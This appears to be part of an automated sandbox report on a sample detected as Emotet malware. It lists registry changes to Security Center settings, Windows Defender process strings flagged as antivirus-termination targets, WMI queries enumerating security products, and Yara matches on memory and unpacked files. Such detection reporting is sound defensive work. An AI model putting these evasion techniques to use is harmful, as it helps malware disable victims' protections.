Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000E.00000002.482370944.0000015D08A40000.00000004.00000001.sdmp Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.482473303.0000015D08B02000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.482370944.0000015D08A40000.00000004.00000001.sdmp Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.482473303.0000015D08B02000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000003.00000002.484278022.0000000002171000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220853815.0000000002631000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220137105.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.483728370.00000000020E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220808157.00000000025E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482905413.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.23cf697d5faf11a3ffdd271e1d301173.exe.2630000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.dot3hc.exe.2170000.1.unpack, type: UNPACKEDPE